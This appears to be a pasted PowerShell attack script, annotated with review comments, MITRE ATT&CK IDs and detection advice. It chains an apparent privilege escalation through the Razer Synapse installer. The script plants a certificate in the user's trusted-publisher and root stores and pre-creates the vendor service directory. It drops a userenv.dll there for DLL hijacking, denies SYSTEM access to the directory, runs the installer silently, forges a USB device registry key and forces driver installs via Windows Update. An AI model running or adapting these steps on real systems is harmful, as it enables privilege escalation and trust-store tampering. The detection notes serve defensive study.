alice_killer

broshell

Nov 9th, 2024 (edited)
  1. ###------------------IMPORTING THE CERTIFICATE TO TRUSTED ZONE--------------------------------------
  2. # Path to the .pfx file to be trusted (the file name suggests a code-signing certificate)
  3. $pfxPath = "C:\Temp\code_signing_cert.pfx"
  4.  
  5. # Load the .pfx into an in-memory X509Certificate2 object, passing $null as the password. PersistKeySet asks for any private key in the file to be persisted. No certificate store is modified by this call.
  6. $pfx = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
  7. $pfx.Import($pfxPath, $null, [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::PersistKeySet)
  8.  
  9. # Add the certificate to the CurrentUser TrustedPublisher store
  10. $store = New-Object System.Security.Cryptography.X509Certificates.X509Store "TrustedPublisher", "CurrentUser"
  11. $store.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite)
  12. $store.Add($pfx)
  13. $store.Close()
  14. # NOTE(review): both stores used here are CurrentUser stores, i.e. per-user trust settings; they are backed by HKCU:\Software\Microsoft\SystemCertificates\<store>\Certificates.
  15. # (Optional, per the author) Also add it to the CurrentUser Root store, making it a trusted root for this user (MITRE ATT&CK T1553.004, Install Root Certificate)
  16. $rootStore = New-Object System.Security.Cryptography.X509Certificates.X509Store "Root", "CurrentUser"
  17. $rootStore.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite)
  18. $rootStore.Add($pfx)
  19. $rootStore.Close()
  20. # Detection: monitor for new entries under HKCU:\Software\Microsoft\SystemCertificates\Root\Certificates and ...\TrustedPublisher\Certificates that were created by a scripting host.
  21. # Audit: list Cert:\CurrentUser\Root and Cert:\CurrentUser\TrustedPublisher with Get-ChildItem and compare the thumbprints against a known-good baseline.
  22.  
  23.  
  24. #------------------Create the vulnerable directory--------------------
  25. # Pre-create the product's service directory under C:\ProgramData before the installer further down runs; -Force keeps New-Item from failing if the directory already exists
  26. $directoryPath = 'C:\ProgramData\Razer\Synapse3\Service'
  27. New-Item -ItemType Directory -Path $directoryPath -Force
  28. # NOTE(review): a directory created this way is owned by the creating account, which can then set its ACL. Installer-side mitigation: do not trust a pre-existing directory under ProgramData; check its owner and reset its ACL before placing service binaries in it.
  29. # Move userenv.dll from C:\Temp into the directory created above (the author calls it the vulnerable directory). As an alternative, the author notes the file could be downloaded from a hosting server.
  30. Move-Item -Path "C:\Temp\userenv.dll" -Destination "C:\ProgramData\Razer\Synapse3\Service" -Force
  31. # userenv.dll is also the name of a Windows system DLL; presumably the copy is meant to be loaded from this directory in place of the system one (DLL search-order hijacking, MITRE ATT&CK T1574.001) - inferred, the paste does not show the loading process.
  32. # Detection: a .dll created under C:\ProgramData\Razer\ by a process other than the vendor installer, and image loads of userenv.dll from any path outside the Windows system directories.
  33. # Same path as above, declared a second time
  34. $directoryPath = "C:\ProgramData\Razer\Synapse3\Service"
  35.  
  36. # If the directory exists, add a Deny ACE for the SYSTEM account to it
  37. if (Test-Path -Path $directoryPath) {
  38.     # Deny rule: identity SYSTEM, rights FullControl. This three-argument constructor takes no inheritance or propagation flags.
  39.     $denyRule = New-Object System.Security.AccessControl.FileSystemAccessRule("SYSTEM", "FullControl", "Deny")
  40.     # NOTE(review): the paste does not say why SYSTEM is blocked; presumably to keep an installer or service running as SYSTEM from cleaning up or re-securing the directory - confirm.
  41.     # Read the directory's access rules, append the deny rule and write the ACL back (MITRE ATT&CK T1222.001)
  42.     $acl = (Get-Item $directoryPath).GetAccessControl('Access')
  43.     $acl.AddAccessRule($denyRule)
  44.     (Get-Item $directoryPath).SetAccessControl($acl)
  45. }
  46. # Detection: an explicit Deny entry for SYSTEM on a vendor directory under C:\ProgramData is rare in normal operation; with file-system auditing and a SACL on the path, the change is logged as Security event 4670 (permissions on an object were changed).
  47.  
  48.  
  49. # Path to the installer staged in C:\Temp; the author notes it could instead be downloaded from a hosting server
  50. $installerPath = "C:\Temp\Razer_Synapse_3.6.exe"
  51. # Run the Razer Synapse installer with /silent, /quiet and /norestart and wait for it to exit. NOTE(review): whether this installer honours those switches is not shown in the paste.
  52. Start-Process -FilePath $installerPath -ArgumentList "/silent", "/quiet", "/norestart" -Wait
  53. # Detection: correlate a vendor installer started from C:\Temp by a PowerShell parent with the earlier DLL drop and ACL change on C:\ProgramData\Razer\Synapse3\Service.
  54.  
  55.  
  56. #------------------------------------Extra effort which didn't trigger the driver installation-----------------------------
  57. # Attempt to make Windows treat a USB device with vendor ID 1532 and product ID 008A as present by writing its key under the USB Enum subtree. Per the author's heading above, this did not trigger driver installation.
  58. $vendorID = "1532"
  59. $deviceID = "008A"
  60. $regPath = "HKLM:\SYSTEM\CurrentControlSet\Enum\USB\VID_$vendorID&PID_$deviceID"
  61.  
  62. # Create the key and set DeviceDesc (String) and HardwareID (MultiString); -Force overwrites existing entries and Out-Null discards the objects the cmdlets return
  63. New-Item -Path $regPath -Force | Out-Null
  64. New-ItemProperty -Path $regPath -Name "DeviceDesc" -Value "Razer Virtual Mouse" -PropertyType String -Force | Out-Null
  65. New-ItemProperty -Path $regPath -Name "HardwareID" -Value "USB\VID_$vendorID&PID_$deviceID" -PropertyType MultiString -Force | Out-Null
  66. # Detection: registry auditing on HKLM\SYSTEM\CurrentControlSet\Enum\USB; keys written there by a script rather than by Plug and Play device enumeration are anomalous.
  67.  
  68. #_---------------------TO trigger the windows update----------------------------------------
  69. # Use the Windows Update Agent COM API to look for driver updates: create an update session and a searcher from it
  70. $updateSession = New-Object -ComObject Microsoft.Update.Session
  71. $updateSearcher = $updateSession.CreateUpdateSearcher()
  72.  
  73. # Search for driver updates that are not yet installed
  74. $searchResult = $updateSearcher.Search("IsInstalled=0 and Type='Driver'")
  75.  
  76. # Only proceed when the search returned at least one update
  77. if ($searchResult.Updates.Count -gt 0) {
  78.     # Copy every update found into a new update collection; Out-Null discards the value returned by Add
  79.     $updatesToInstall = New-Object -ComObject Microsoft.Update.UpdateColl
  80.     foreach ($update in $searchResult.Updates) {
  81.         $updatesToInstall.Add($update) | Out-Null
  82.     }
  83.    
  84.     # Install the whole collection. NOTE(review): this covers every pending driver update the search returned, not only one for the device above, and $installationResult is never inspected afterwards.
  85.     $installer = $updateSession.CreateUpdateInstaller()
  86.     $installer.Updates = $updatesToInstall
  87.     $installationResult = $installer.Install()
  88. }
  89. # Detection: Microsoft.Update.Session instantiated from a PowerShell process, followed by driver installations in the Windows Update history that no administrator scheduled.